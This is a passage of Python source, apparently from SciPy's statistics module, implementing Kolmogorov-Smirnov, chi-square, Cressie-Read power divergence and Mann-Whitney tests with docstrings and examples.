t, prob = _ttest_finish(df, t)
return Ttest_relResult(t, prob)
KstestResult = namedtuple('KstestResult', ('statistic', 'pvalue'))
def kstest(rvs, cdf, args=(), N=20, alternative='two-sided', mode='approx'):
"""
Perform the Kolmogorov-Smirnov test for goodness of fit.
This performs a test of the distribution F(x) of an observed
random variable against a given distribution G(x). Under the null
hypothesis, the two distributions are identical, F(x)=G(x). The
alternative hypothesis can be either 'two-sided' (default), 'less'
or 'greater'. The KS test is only valid for continuous distributions.
Parameters
----------
rvs : str, array_like, or callable
If a string, it should be the name of a distribution in `scipy.stats`.
If an array, it should be a 1-D array of observations of random
variables.
If a callable, it should be a function to generate random variables;
it is required to have a keyword argument `size`.
cdf : str or callable
If a string, it should be the name of a distribution in `scipy.stats`.
If `rvs` is a string then `cdf` can be False or the same as `rvs`.
If a callable, that callable is used to calculate the cdf.
args : tuple, sequence, optional
Distribution parameters, used if `rvs` or `cdf` are strings.
N : int, optional
Sample size if `rvs` is string or callable. Default is 20.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided, see explanation in Notes
* 'greater': one-sided, see explanation in Notes
mode : {'approx', 'asymp'}, optional
Defines the distribution used for calculating the p-value.
The following options are available (default is 'approx'):
* 'approx': use approximation to exact distribution of test statistic
* 'asymp': use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS test statistic, either D, D+ or D-.
pvalue : float
One-tailed or two-tailed p-value.
See Also
--------
ks_2samp
Notes
-----
In the one-sided test, the alternative is that the empirical
cumulative distribution function of the random variable is "less"
or "greater" than the cumulative distribution function G(x) of the
hypothesis, ``F(x)<=G(x)``, resp. ``F(x)>=G(x)``.
Examples
--------
>>> from scipy import stats
>>> x = np.linspace(-15, 15, 9)
>>> stats.kstest(x, 'norm')
(0.44435602715924361, 0.038850142705171065)
>>> np.random.seed(987654321) # set random seed to get the same result
>>> stats.kstest('norm', False, N=100)
(0.058352892479417884, 0.88531190944151261)
The above lines are equivalent to:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.norm.rvs(size=100), 'norm')
(0.058352892479417884, 0.88531190944151261)
*Test against one-sided alternative hypothesis*
Shift distribution to larger values, so that ``cdf_dgp(x) < norm.cdf(x)``:
>>> np.random.seed(987654321)
>>> x = stats.norm.rvs(loc=0.2, size=100)
>>> stats.kstest(x,'norm', alternative = 'less')
(0.12464329735846891, 0.040989164077641749)
Reject equal distribution against alternative hypothesis: less
>>> stats.kstest(x,'norm', alternative = 'greater')
(0.0072115233216311081, 0.98531158590396395)
Don't reject equal distribution against alternative hypothesis: greater
>>> stats.kstest(x,'norm', mode='asymp')
(0.12464329735846891, 0.08944488871182088)
*Testing t distributed random variables against normal distribution*
With 100 degrees of freedom the t distribution looks close to the normal
distribution, and the K-S test does not reject the hypothesis that the
sample came from the normal distribution:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.t.rvs(100,size=100),'norm')
(0.072018929165471257, 0.67630062862479168)
With 3 degrees of freedom the t distribution looks sufficiently different
from the normal distribution, that we can reject the hypothesis that the
sample came from the normal distribution at the 10% level:
>>> np.random.seed(987654321)
>>> stats.kstest(stats.t.rvs(3,size=100),'norm')
(0.131016895759829, 0.058826222555312224)
"""
if isinstance(rvs, string_types):
if (not cdf) or (cdf == rvs):
cdf = getattr(distributions, rvs).cdf
rvs = getattr(distributions, rvs).rvs
else:
raise AttributeError("if rvs is string, cdf has to be the "
"same distribution")
if isinstance(cdf, string_types):
cdf = getattr(distributions, cdf).cdf
if callable(rvs):
kwds = {'size': N}
vals = np.sort(rvs(*args, **kwds))
else:
vals = np.sort(rvs)
N = len(vals)
cdfvals = cdf(vals, *args)
# to not break compatibility with existing code
if alternative == 'two_sided':
alternative = 'two-sided'
if alternative in ['two-sided', 'greater']:
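# D+ : the largest amount by which the empirical CDF exceeds the
# hypothesized CDF.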
Dplus = (np.arange(1.0, N + 1)/N - cdfvals).max()
if alternative == 'greater':
return KstestResult(Dplus, distributions.ksone.sf(Dplus, N))
if alternative in ['two-sided', 'less']:
Dmin = (cdfvals - np.arange(0.0, N)/N).max()
if alternative == 'less':
return KstestResult(Dmin, distributions.ksone.sf(Dmin, N))
if alternative == 'two-sided':
D = np.max([Dplus, Dmin])
if mode == 'asymp':
return KstestResult(D, distributions.kstwobign.sf(D * np.sqrt(N)))
if mode == 'approx':
pval_two = distributions.kstwobign.sf(D * np.sqrt(N))
if N > 2666 or pval_two > 0.80 - N*0.3/1000:
return KstestResult(D, pval_two)
else:
return KstestResult(D, 2 * distributions.ksone.sf(D, N))
# Map from names to lambda_ values used in power_divergence().
_power_div_lambda_names = {
"pearson": 1,
"log-likelihood": 0,
"freeman-tukey": -0.5,
"mod-log-likelihood": -1,
"neyman": -2,
"cressie-read": 2/3,
}
def _count(a, axis=None):
"""
Count the number of non-masked elements of an array.
This function behaves like np.ma.count(), but is much faster
for ndarrays.
"""
if hasattr(a, 'count'):
num = a.count(axis=axis)
if isinstance(num, np.ndarray) and num.ndim == 0:
# In some cases, the `count` method returns a scalar array (e.g.
# np.array(3)), but we want a plain integer.
num = int(num)
else:
if axis is None:
num = a.size
else:
num = a.shape[axis]
return num
Power_divergenceResult = namedtuple('Power_divergenceResult',
('statistic', 'pvalue'))
def power_divergence(f_obs, f_exp=None, ddof=0, axis=0, lambda_=None):
"""
Cressie-Read power divergence statistic and goodness of fit test.
This function tests the null hypothesis that the categorical data
has the given frequencies, using the Cressie-Read power divergence
statistic.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
lambda_ : float or str, optional
The power in the Cressie-Read power divergence statistic. The default
is 1. For convenience, `lambda_` may be assigned one of the following
strings, in which case the corresponding numerical value is used::
String              Value   Description
"pearson"             1     Pearson's chi-squared statistic.
                            In this case, the function is
                            equivalent to `stats.chisquare`.
"log-likelihood"      0     Log-likelihood ratio. Also known as
                            the G-test [3]_.
"freeman-tukey"      -1/2   Freeman-Tukey statistic.
"mod-log-likelihood" -1     Modified log-likelihood ratio.
"neyman"             -2     Neyman's statistic.
"cressie-read"        2/3   The power recommended in [5]_.
Returns
-------
statistic : float or ndarray
The Cressie-Read power divergence test statistic. The value is
a float if `axis` is None or if `f_obs` and `f_exp` are 1-D.
pvalue : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `stat` are scalars.
See Also
--------
chisquare
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
When `lambda_` is less than zero, the formula for the statistic involves
dividing by `f_obs`, so a warning or error may be generated if any value
in `f_obs` is 0.
Similarly, a warning or error may be generated if any value in `f_exp` is
zero when `lambda_` >= 0.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not a chisquare, in which case this
test is not appropriate.
This function handles masked arrays. If an element of `f_obs` or `f_exp`
is masked, then data at that position is ignored, and does not count
towards the size of the data set.
.. versionadded:: 0.13.0
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171015035606/http://faculty.vassar.edu/lowry/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
.. [3] "G-test", https://en.wikipedia.org/wiki/G-test
.. [4] Sokal, R. R. and Rohlf, F. J. "Biometry: the principles and
practice of statistics in biological research", New York: Freeman
(1981)
.. [5] Cressie, N. and Read, T. R. C., "Multinomial Goodness-of-Fit
Tests", J. Royal Stat. Soc. Series B, Vol. 46, No. 3 (1984),
pp. 440-464.
Examples
--------
(See `chisquare` for more examples.)
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies. Here we
perform a G-test (i.e. use the log-likelihood ratio statistic):
>>> from scipy.stats import power_divergence
>>> power_divergence([16, 18, 16, 14, 12, 12], lambda_='log-likelihood')
(2.006573162632538, 0.84823476779463769)
The expected frequencies can be given with the `f_exp` argument:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[16, 16, 16, 16, 16, 8],
... lambda_='log-likelihood')
(3.3281031458963746, 0.6495419288047497)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> power_divergence(obs, lambda_="log-likelihood")
(array([ 2.00657316, 6.77634498]), array([ 0.84823477, 0.23781225]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> power_divergence(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> power_divergence(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
test statistic with `ddof`.
>>> power_divergence([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we must use ``axis=1``:
>>> power_divergence([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8],
... [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
# Convert the input argument `lambda_` to a numerical value.
if isinstance(lambda_, string_types):
if lambda_ not in _power_div_lambda_names:
names = repr(list(_power_div_lambda_names.keys()))[1:-1]
raise ValueError("invalid string for lambda_: {0!r}. Valid strings "
"are {1}".format(lambda_, names))
lambda_ = _power_div_lambda_names[lambda_]
elif lambda_ is None:
lambda_ = 1
f_obs = np.asanyarray(f_obs)
if f_exp is not None:
f_exp = np.asanyarray(f_exp)
else:
# Ignore 'invalid' errors so the edge case of a data set with length 0
# is handled without spurious warnings.
with np.errstate(invalid='ignore'):
f_exp = f_obs.mean(axis=axis, keepdims=True)
# `terms` is the array of terms that are summed along `axis` to create
# the test statistic. We use some specialized code for a few special
# cases of lambda_.
if lambda_ == 1:
# Pearson's chi-squared statistic
terms = (f_obs - f_exp)**2 / f_exp
elif lambda_ == 0:
# Log-likelihood ratio (i.e. G-test)
terms = 2.0 * special.xlogy(f_obs, f_obs / f_exp)
elif lambda_ == -1:
# Modified log-likelihood ratio
terms = 2.0 * special.xlogy(f_exp, f_exp / f_obs)
else:
# General Cressie-Read power divergence.
terms = f_obs * ((f_obs / f_exp)**lambda_ - 1)
terms /= 0.5 * lambda_ * (lambda_ + 1)
stat = terms.sum(axis=axis)
num_obs = _count(terms, axis=axis)
ddof = asarray(ddof)
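# The p-value comes from the chi-squared survival function with
# k - 1 - ddof degrees of freedom; broadcasting handles array-valued ddof.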
p = distributions.chi2.sf(stat, num_obs - 1 - ddof)
return Power_divergenceResult(stat, p)
def chisquare(f_obs, f_exp=None, ddof=0, axis=0):
"""
Calculate a one-way chi-square test.
The chi-square test tests the null hypothesis that the categorical data
has the given frequencies.
Parameters
----------
f_obs : array_like
Observed frequencies in each category.
f_exp : array_like, optional
Expected frequencies in each category. By default the categories are
assumed to be equally likely.
ddof : int, optional
"Delta degrees of freedom": adjustment to the degrees of freedom
for the p-value. The p-value is computed using a chi-squared
distribution with ``k - 1 - ddof`` degrees of freedom, where `k`
is the number of observed frequencies. The default value of `ddof`
is 0.
axis : int or None, optional
The axis of the broadcast result of `f_obs` and `f_exp` along which to
apply the test. If axis is None, all values in `f_obs` are treated
as a single data set. Default is 0.
Returns
-------
chisq : float or ndarray
The chi-squared test statistic. The value is a float if `axis` is
None or `f_obs` and `f_exp` are 1-D.
p : float or ndarray
The p-value of the test. The value is a float if `ddof` and the
return value `chisq` are scalars.
See Also
--------
scipy.stats.power_divergence
Notes
-----
This test is invalid when the observed or expected frequencies in each
category are too small. A typical rule is that all of the observed
and expected frequencies should be at least 5.
The default degrees of freedom, k-1, are for the case when no parameters
of the distribution are estimated. If p parameters are estimated by
efficient maximum likelihood then the correct degrees of freedom are
k-1-p. If the parameters are estimated in a different way, then the
dof can be between k-1-p and k-1. However, it is also possible that
the asymptotic distribution is not chi-square, in which case this test
is not appropriate.
References
----------
.. [1] Lowry, Richard. "Concepts and Applications of Inferential
Statistics". Chapter 8.
https://web.archive.org/web/20171022032306/http://vassarstats.net:80/textbook/ch8pt1.html
.. [2] "Chi-squared test", https://en.wikipedia.org/wiki/Chi-squared_test
Examples
--------
When just `f_obs` is given, it is assumed that the expected frequencies
are uniform and given by the mean of the observed frequencies.
>>> from scipy.stats import chisquare
>>> chisquare([16, 18, 16, 14, 12, 12])
(2.0, 0.84914503608460956)
With `f_exp` the expected frequencies can be given.
>>> chisquare([16, 18, 16, 14, 12, 12], f_exp=[16, 16, 16, 16, 16, 8])
(3.5, 0.62338762774958223)
When `f_obs` is 2-D, by default the test is applied to each column.
>>> obs = np.array([[16, 18, 16, 14, 12, 12], [32, 24, 16, 28, 20, 24]]).T
>>> obs.shape
(6, 2)
>>> chisquare(obs)
(array([ 2. , 6.66666667]), array([ 0.84914504, 0.24663415]))
By setting ``axis=None``, the test is applied to all data in the array,
which is equivalent to applying the test to the flattened array.
>>> chisquare(obs, axis=None)
(23.31034482758621, 0.015975692534127565)
>>> chisquare(obs.ravel())
(23.31034482758621, 0.015975692534127565)
`ddof` is the change to make to the default degrees of freedom.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=1)
(2.0, 0.73575888234288467)
The calculation of the p-values is done by broadcasting the
chi-squared statistic with `ddof`.
>>> chisquare([16, 18, 16, 14, 12, 12], ddof=[0,1,2])
(2.0, array([ 0.84914504, 0.73575888, 0.5724067 ]))
`f_obs` and `f_exp` are also broadcast. In the following, `f_obs` has
shape (6,) and `f_exp` has shape (2, 6), so the result of broadcasting
`f_obs` and `f_exp` has shape (2, 6). To compute the desired chi-squared
statistics, we use ``axis=1``:
>>> chisquare([16, 18, 16, 14, 12, 12],
... f_exp=[[16, 16, 16, 16, 16, 8], [8, 20, 20, 16, 12, 12]],
... axis=1)
(array([ 3.5 , 9.25]), array([ 0.62338763, 0.09949846]))
"""
return power_divergence(f_obs, f_exp=f_exp, ddof=ddof, axis=axis,
lambda_="pearson")
Ks_2sampResult = namedtuple('Ks_2sampResult', ('statistic', 'pvalue'))
def _compute_prob_inside_method(m, n, g, h):
"""
Count the proportion of paths that stay strictly inside two diagonal lines.
Parameters
----------
m : integer
m > 0
n : integer
n > 0
g : integer
g is greatest common divisor of m and n
h : integer
0 <= h <= lcm(m,n)
Returns
-------
p : float
The proportion of paths that stay inside the two lines.
Count the integer lattice paths from (0, 0) to (m, n) which satisfy
|x/m - y/n| < h / lcm(m, n).
The paths make steps of size +1 in either positive x or positive y directions.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk.
Hodges, J.L. Jr.,
"The Significance Probability of the Smirnov Two-Sample Test,"
Arkiv för Matematik, 3, No. 43 (1958), 469-86.
"""
# Probability is symmetrical in m, n. Computation below uses m >= n.
if m < n:
m, n = n, m
mg = m // g
ng = n // g
# Count the integer lattice paths from (0, 0) to (m, n) which satisfy
# |nx/g - my/g| < h.
# Compute matrix A such that:
# A(x, 0) = A(0, y) = 1
# A(x, y) = A(x, y-1) + A(x-1, y), for x,y>=1, except that
# A(x, y) = 0 if |x/m - y/n|>= h
# Probability is A(m, n)/binom(m+n, n)
# Optimizations exist for m==n, m==n*p.
# Only need to preserve a single column of A, and only a sliding window of it.
# minj keeps track of the slide.
minj, maxj = 0, min(int(np.ceil(h / mg)), n + 1)
curlen = maxj - minj
# Make a vector long enough to hold maximum window needed.
lenA = min(2 * maxj + 2, n + 1)
# This is an integer calculation, but the entries are essentially
# binomial coefficients, hence grow quickly.
# Scaling after each column is computed avoids dividing by a
# large binomial coefficient at the end. Instead it is incorporated
# one factor at a time during the computation.
dtype = np.float64
A = np.zeros(lenA, dtype=dtype)
# Initialize the first column
A[minj:maxj] = 1
for i in range(1, m + 1):
# Generate the next column.
# First calculate the sliding window
lastminj, lastmaxj, lastlen = minj, maxj, curlen
minj = max(int(np.floor((ng * i - h) / mg)) + 1, 0)
minj = min(minj, n)
maxj = min(int(np.ceil((ng * i + h) / mg)), n + 1)
if maxj <= minj:
return 0
# Now fill in the values
A[0:maxj - minj] = np.cumsum(A[minj - lastminj:maxj - lastminj])
curlen = maxj - minj
if lastlen > curlen:
# Set some carried-over elements to 0
A[maxj - minj:maxj - minj + (lastlen - curlen)] = 0
# Peel off one term from each of top and bottom of the binomial coefficient.
scaling_factor = i * 1.0 / (n + i)
A *= scaling_factor
return A[maxj - minj - 1]
def _compute_prob_outside_square(n, h):
"""
Compute the proportion of paths that pass outside the two diagonal lines.
Parameters
----------
n : integer
n > 0
h : integer
0 <= h <= n
Returns
-------
p : float
The proportion of paths that pass outside the lines x-y = +/-h.
"""
# Compute Pr(D_{n,n} >= h/n)
# Prob = 2 * ( binom(2n, n-h) - binom(2n, n-2h) + binom(2n, n-3h) - ... ) / binom(2n, n)
# This formulation exhibits subtractive cancellation.
# Instead divide each term by binom(2n, n), then factor common terms
# and use a Horner-like algorithm
# P = 2 * A0 * (1 - A1*(1 - A2*(1 - A3*(1 - A4*(...)))))
P = 0.0
k = int(np.floor(n / h))
while k >= 0:
p1 = 1.0
# Each of the Ai terms has numerator and denominator with h simple terms.
for j in range(h):
p1 = (n - k * h - j) * p1 / (n + k * h + j + 1)
P = p1 * (1.0 - P)
k -= 1
return 2 * P
def _count_paths_outside_method(m, n, g, h):
"""
Count the number of paths that pass outside the specified diagonal.
Parameters
----------
m : integer
m > 0
n : integer
n > 0
g : integer
g is greatest common divisor of m and n
h : integer
0 <= h <= lcm(m,n)
Returns
-------
p : float
The number of paths that go low.
The calculation may overflow - check for a finite answer.
Raises
------
FloatingPointError
    Raised if the intermediate computation goes outside the range of a float.
Notes
-----
Count the integer lattice paths from (0, 0) to (m, n), which at some
point (x, y) along the path, satisfy:
m*y <= n*x - h*g
The paths make steps of size +1 in either positive x or positive y directions.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk.
Hodges, J.L. Jr.,
"The Significance Probability of the Smirnov Two-Sample Test,"
Arkiv för Matematik, 3, No. 43 (1958), 469-86.
"""
# Compute #paths which stay lower than x/m-y/n = h/lcm(m,n)
# B(x, y) = #{paths from (0,0) to (x,y) without previously crossing the boundary}
# = binom(x, y) - #{paths which already reached the boundary}
# Multiply by the number of path extensions going from (x, y) to (m, n)
# Sum.
# Probability is symmetrical in m, n. Computation below assumes m >= n.
if m < n:
m, n = n, m
mg = m // g
ng = n // g
# 0 <= x_j <= m is the smallest integer for which n*x_j - m*j < g*h
xj = [int(np.ceil((h + mg * j)/ng)) for j in range(n+1)]
xj = [_ for _ in xj if _ <= m]
lxj = len(xj)
# B is an array just holding a few values of B(x,y), the ones needed.
# B[j] == B(x_j, j)
if lxj == 0:
return np.round(special.binom(m + n, n))
B = np.zeros(lxj)
B[0] = 1
# Compute the B(x, y) terms
# The binomial coefficient is an integer, but special.binom() may return a float.
# Round it to the nearest integer.
for j in range(1, lxj):
Bj = np.round(special.binom(xj[j] + j, j))
if not np.isfinite(Bj):
raise FloatingPointError()
for i in range(j):
bin = np.round(special.binom(xj[j] - xj[i] + j - i, j-i))
dec = bin * B[i]
Bj -= dec
B[j] = Bj
if not np.isfinite(Bj):
raise FloatingPointError()
# Compute the number of path extensions...
num_paths = 0
for j in range(lxj):
bin = np.round(special.binom((m-xj[j]) + (n - j), n-j))
term = B[j] * bin
if not np.isfinite(term):
raise FloatingPointError()
num_paths += term
return np.round(num_paths)
def ks_2samp(data1, data2, alternative='two-sided', mode='auto'):
"""
Compute the Kolmogorov-Smirnov statistic on 2 samples.
This is a two-sided test for the null hypothesis that 2 independent samples
are drawn from the same continuous distribution. The alternative hypothesis
can be either 'two-sided' (default), 'less' or 'greater'.
Parameters
----------
data1, data2 : sequence of 1-D ndarrays
Two arrays of sample observations assumed to be drawn from a continuous
distribution, sample sizes can be different.
alternative : {'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is 'two-sided'):
* 'two-sided'
* 'less': one-sided, see explanation in Notes
* 'greater': one-sided, see explanation in Notes
mode : {'auto', 'exact', 'asymp'}, optional
Defines the method used for calculating the p-value.
The following options are available (default is 'auto'):
* 'auto' : use 'exact' for small size arrays, 'asymp' for large
* 'exact' : use exact distribution of test statistic
* 'asymp' : use asymptotic distribution of test statistic
Returns
-------
statistic : float
KS statistic.
pvalue : float
Two-tailed p-value.
See Also
--------
kstest
Notes
-----
This tests whether 2 samples are drawn from the same distribution. Note
that, like in the case of the one-sample KS test, the distribution is
assumed to be continuous.
In the one-sided test, the alternative is that the empirical
cumulative distribution function F(x) of the data1 variable is "less"
or "greater" than the empirical cumulative distribution function G(x)
of the data2 variable, ``F(x)<=G(x)``, resp. ``F(x)>=G(x)``.
If the KS statistic is small or the p-value is high, then we cannot
reject the hypothesis that the distributions of the two samples
are the same.
If the mode is 'auto', the computation is exact if the sample sizes are
less than 10000. For larger sizes, the computation uses the
Kolmogorov-Smirnov distributions to compute an approximate value.
We generally follow Hodges' treatment of Drion/Gnedenko/Korolyuk [1]_.
References
----------
.. [1] Hodges, J.L. Jr., "The Significance Probability of the Smirnov
Two-Sample Test," Arkiv för Matematik, 3, No. 43 (1958), 469-86.
Examples
--------
>>> from scipy import stats
>>> np.random.seed(12345678) #fix random seed to get the same result
>>> n1 = 200 # size of first sample
>>> n2 = 300 # size of second sample
For a different distribution, we can reject the null hypothesis since the
pvalue is below 1%:
>>> rvs1 = stats.norm.rvs(size=n1, loc=0., scale=1)
>>> rvs2 = stats.norm.rvs(size=n2, loc=0.5, scale=1.5)
>>> stats.ks_2samp(rvs1, rvs2)
(0.20833333333333334, 5.129279597781977e-05)
For a slightly different distribution, we cannot reject the null hypothesis
at a 10% or lower alpha since the p-value at 0.144 is higher than 10%
>>> rvs3 = stats.norm.rvs(size=n2, loc=0.01, scale=1.0)
>>> stats.ks_2samp(rvs1, rvs3)
(0.10333333333333333, 0.14691437867433876)
For an identical distribution, we cannot reject the null hypothesis since
the p-value is high, 41%:
>>> rvs4 = stats.norm.rvs(size=n2, loc=0.0, scale=1.0)
>>> stats.ks_2samp(rvs1, rvs4)
(0.07999999999999996, 0.41126949729859719)
"""
LARGE_N = 10000 # 'auto' will attempt to be exact if n1,n2 <= LARGE_N
data1 = np.sort(data1)
data2 = np.sort(data2)
n1 = data1.shape[0]
n2 = data2.shape[0]
if min(n1, n2) == 0:
raise ValueError('Data passed to ks_2samp must not be empty')
data_all = np.concatenate([data1, data2])
# using searchsorted solves equal data problem
cdf1 = np.searchsorted(data1, data_all, side='right') / n1
cdf2 = np.searchsorted(data2, data_all, side='right') / n2
cddiffs = cdf1 - cdf2
minS = -np.min(cddiffs)
maxS = np.max(cddiffs)
alt2Dvalue = {'less': minS, 'greater': maxS, 'two-sided': max(minS, maxS)}
d = alt2Dvalue[alternative]
g = gcd(n1, n2)
n1g = n1 // g
n2g = n2 // g
prob = -np.inf
original_mode = mode
if mode == 'auto':
if max(n1, n2) <= LARGE_N:
mode = 'exact'
else:
mode = 'asymp'
elif mode == 'exact':
# If lcm(n1, n2) is too big, switch from exact to asymp
if n1g >= np.iinfo(np.int).max / n2g:
mode = 'asymp'
warnings.warn(
"Exact ks_2samp calculation not possible with samples sizes "
"%d and %d. Switching to 'asymp' " % (n1, n2), RuntimeWarning)
saw_fp_error = False
if mode == 'exact':
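# Put the observed statistic d on the integer lattice: h is d expressed
# in steps of 1/lcm(n1, n2), so the path-counting helpers below can work
# with integers.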
lcm = (n1 // g) * n2
h = int(np.round(d * lcm))
d = h * 1.0 / lcm
if h == 0:
prob = 1.0
else:
try:
if alternative == 'two-sided':
if n1 == n2:
prob = _compute_prob_outside_square(n1, h)
else:
prob = 1 - _compute_prob_inside_method(n1, n2, g, h)
else:
if n1 == n2:
# prob = binom(2n, n-h) / binom(2n, n)
# Evaluating in that form incurs roundoff errors
# from special.binom. Instead calculate directly
prob = 1.0
for j in range(h):
prob = (n1 - j) * prob / (n1 + j + 1)
else:
num_paths = _count_paths_outside_method(n1, n2, g, h)
bin = special.binom(n1 + n2, n1)
if not np.isfinite(bin) or not np.isfinite(num_paths) or num_paths > bin:
raise FloatingPointError()
prob = num_paths / bin
except FloatingPointError:
# Switch mode
mode = 'asymp'
saw_fp_error = True
# Can't raise warning here, inside the try
finally:
if saw_fp_error:
if original_mode == 'exact':
warnings.warn(
"ks_2samp: Exact calculation overflowed. "
"Switching to mode=%s" % mode, RuntimeWarning)
else:
if prob > 1 or prob < 0:
mode = 'asymp'
if original_mode == 'exact':
warnings.warn(
"ks_2samp: Exact calculation incurred large"
" rounding error. Switching to mode=%s" % mode,
RuntimeWarning)
if mode == 'asymp':
# The product n1*n2 is large. Use Smirnov's asymptotic formula.
if alternative == 'two-sided':
en = np.sqrt(n1 * n2 / (n1 + n2))
# Switch to using kstwo.sf() when it becomes available.
# prob = distributions.kstwo.sf(d, int(np.round(en)))
prob = distributions.kstwobign.sf(en * d)
else:
m, n = max(n1, n2), min(n1, n2)
z = np.sqrt(m*n/(m+n)) * d
# Use Hodges' suggested approximation Eqn 5.3
expt = -2 * z**2 - 2 * z * (m + 2*n)/np.sqrt(m*n*(m+n))/3.0
prob = np.exp(expt)
prob = (0 if prob < 0 else (1 if prob > 1 else prob))
return Ks_2sampResult(d, prob)
def tiecorrect(rankvals):
"""
Tie correction factor for Mann-Whitney U and Kruskal-Wallis H tests.
Parameters
----------
rankvals : array_like
A 1-D sequence of ranks. Typically this will be the array
returned by `~scipy.stats.rankdata`.
Returns
-------
factor : float
Correction factor for U or H.
See Also
--------
rankdata : Assign ranks to the data
mannwhitneyu : Mann-Whitney rank test
kruskal : Kruskal-Wallis H test
References
----------
.. [1] Siegel, S. (1956) Nonparametric Statistics for the Behavioral
Sciences. New York: McGraw-Hill.
Examples
--------
>>> from scipy.stats import tiecorrect, rankdata
>>> tiecorrect([1, 2.5, 2.5, 4])
0.9
>>> ranks = rankdata([1, 3, 2, 4, 5, 7, 2, 8, 4])
>>> ranks
array([ 1. , 4. , 2.5, 5.5, 7. , 8. , 2.5, 9. , 5.5])
>>> tiecorrect(ranks)
0.9833333333333333
"""
arr = np.sort(rankvals)
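# idx marks the boundaries between runs of tied ranks; np.diff then gives
# the size of each tie group.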
idx = np.nonzero(np.r_[True, arr[1:] != arr[:-1], True])[0]
cnt = np.diff(idx).astype(np.float64)
size = np.float64(arr.size)
return 1.0 if size < 2 else 1.0 - (cnt**3 - cnt).sum() / (size**3 - size)
MannwhitneyuResult = namedtuple('MannwhitneyuResult', ('statistic', 'pvalue'))
def mannwhitneyu(x, y, use_continuity=True, alternative=None):
"""
Compute the Mann-Whitney rank test on samples x and y.
Parameters
----------
x, y : array_like
Array of samples, should be one-dimensional.
use_continuity : bool, optional
Whether a continuity correction (1/2.) should be taken into
account. Default is True.
alternative : {None, 'two-sided', 'less', 'greater'}, optional
Defines the alternative hypothesis.
The following options are available (default is None):
* None: computes p-value half the size of the 'two-sided' p-value and
a different U statistic. The default behavior is not the same as
using 'less' or 'greater'; it only exists for backward compatibility
and is deprecated.
* 'two-sided'
* 'less': one-sided
* 'greater': one-sided
Use of the None option is deprecated.
Returns
-------
statistic : float
The Mann-Whitney U statistic, equal to min(U for x, U for y) if
`alternative` is equal to None (deprecated; exists for backward
compatibility), and U for y otherwise.
pvalue : float
p-value assuming an asymptotic normal distribution. One-sided or
two-sided, depending on the choice of `alternative`.
Notes
-----
Use only when the number of observations in each sample is > 20 and
you have 2 independent samples of ranks. Mann-Whitney U is
significant if the obtained U is less than or equal to the critical
value of U.
This test corrects for ties and by default uses a continuity correction.
References
----------
.. [1] https://en.wikipedia.org/wiki/Mann-Whitney_U_test
.. [2] H.B. Mann and D.R. Whitney, "On a Test of Whether one of Two Random
Variables is Stochastically Larger than the Other," The Annals of
Mathematical Statistics, vol. 18, no. 1, pp. 50-60, 1947.
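Examples
--------
A minimal usage sketch; the input lists are illustrative only and the
result is bound to names rather than printed:
>>> from scipy import stats
>>> x = [2, 4, 6, 8, 10]
>>> y = [1, 3, 5, 7, 9, 11]
>>> u_statistic, p_value = stats.mannwhitneyu(x, y, alternative='two-sided')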
"""
if alternative is None:
warnings.warn("Calling `mannwhitneyu` without specifying "
"`alternative` is deprecated.", DeprecationWarning)
x = np.asarray(x)
y = np.asarray(y)
n1 = len(x)
n2 = len(y)
ranked = rankdata(np.concatenate((x, y)))
rankx = ranked[0:n1] # get the x-ranks
u1 = n1*n2 + (n1*(n1+1))/2.0 - np.sum(rankx, axis=0) # calc U for x
u2 = n1*n2 - u1 # remainder is U for y
T = tiecorrect(ranked)
if T == 0:
raise ValueError('All numbers are identical in mannwhitneyu')
sd = np.sqrt(T * n1 * n2 * (n1+n2+1) / 12.0)
meanrank = n1*n2/2.0 + 0.5 * use_continuity
if alternative is None or alternative == 'two-sided':
bigu = max(u1, u2)
elif alternative == 'less':
